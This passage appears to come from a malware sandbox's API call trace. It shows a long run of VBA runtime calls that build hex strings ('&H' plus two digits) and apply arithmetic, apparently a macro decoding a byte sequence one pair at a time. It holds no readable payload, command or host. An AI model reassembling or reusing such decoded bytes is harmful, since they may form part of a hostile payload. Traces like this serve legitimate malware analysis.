pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.566] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.566] VarBstrCat (in: bstrLeft="&H0", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.566] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.566] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.566] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.566] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.566] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.566] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.567] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.567] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.567] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.567] VarBstrCat (in: bstrLeft="&Hf", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.567] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.567] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.567] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.567] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.567] VarBstrCat (in: bstrLeft="&H2", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.567] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.568] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.568] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.568] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.568] VarBstrCat (in: bstrLeft="&H1", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.568] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.568] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.568] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.568] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.568] VarBstrCat (in: bstrLeft="&H1", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.568] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.569] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.569] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.569] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.569] VarBstrCat (in: bstrLeft="&H5", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.569] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.569] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.569] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.569] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.569] VarBstrCat (in: bstrLeft="&Hb", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.569] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.570] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.570] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.570] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.570] VarBstrCat (in: bstrLeft="&H6", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.570] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.570] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.570] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.570] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.570] VarBstrCat (in: bstrLeft="&H8", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.571] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.571] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.571] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.571] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.571] VarBstrCat (in: bstrLeft="&H0", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.571] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.571] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.571] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.571] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.572] VarBstrCat (in: bstrLeft="&H3", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.572] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.572] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.572] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.572] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.572] VarBstrCat (in: bstrLeft="&H7", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.572] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.572] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.573] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.573] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.573] VarBstrCat (in: bstrLeft="&H4", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.573] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.573] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.573] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.573] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.573] VarBstrCat (in: bstrLeft="&H8", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.573] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.573] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.574] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.574] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.574] VarBstrCat (in: bstrLeft="&Hf", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.574] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.574] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.574] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.574] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.574] VarBstrCat (in: bstrLeft="&H2", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.574] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.575] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.575] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.575] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.575] VarBstrCat (in: bstrLeft="&H0", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.575] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.575] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.575] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.575] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.575] VarBstrCat (in: bstrLeft="&Hf", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.575] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.576] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.576] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.576] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.576] VarBstrCat (in: bstrLeft="&Hb", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.576] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.576] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.576] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.576] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.577] VarBstrCat (in: bstrLeft="&H9", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.577] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.577] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.577] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.577] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.577] VarBstrCat (in: bstrLeft="&Hc", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.577] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.577] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.578] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.578] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.578] VarBstrCat (in: bstrLeft="&H1", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.578] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.578] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.578] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.578] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.578] VarBstrCat (in: bstrLeft="&Ha", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.578] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.578] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.579] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.579] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.579] VarBstrCat (in: bstrLeft="&Hc", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.579] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.579] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.580] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.580] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.580] VarBstrCat (in: bstrLeft="&H4", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.580] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.581] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.581] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.581] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.581] VarBstrCat (in: bstrLeft="&H3", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.581] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.581] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.581] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.581] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.581] VarBstrCat (in: bstrLeft="&H7", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.581] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.582] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.582] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.582] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.582] VarBstrCat (in: bstrLeft="&H6", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.582] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.582] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.582] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.582] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.582] VarBstrCat (in: bstrLeft="&He", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.582] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.583] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.583] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.583] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.583] VarBstrCat (in: bstrLeft="&H4", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.583] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.583] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.583] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.583] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.583] VarBstrCat (in: bstrLeft="&Hf", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.583] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.584] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.584] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.584] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.584] VarBstrCat (in: bstrLeft="&Hf", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.584] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.584] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.584] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.584] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.584] VarBstrCat (in: bstrLeft="&Ha", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.584] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.584] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.585] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.585] VarBstrCat (in: bstrLeft="&H", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.585] VarBstrCat (in: bstrLeft="&H4", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.585] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.585] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.585] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.585] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.585] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.585] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.585] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.585] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.586] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.586] VarBstrCat (in: bstrLeft="&H6", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.586] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.586] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.586] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.586] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.586] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.586] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.586] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.586] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.586] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.586] VarBstrCat (in: bstrLeft="&He", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.586] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.587] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.587] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.587] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.587] VarBstrCat (in: bstrLeft="&He", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.587] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.587] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.587] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.587] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.587] VarBstrCat (in: bstrLeft="&Hd", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.587] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.587] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.587] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.587] VarBstrCat (in: bstrLeft="&H", bstrRight="8", 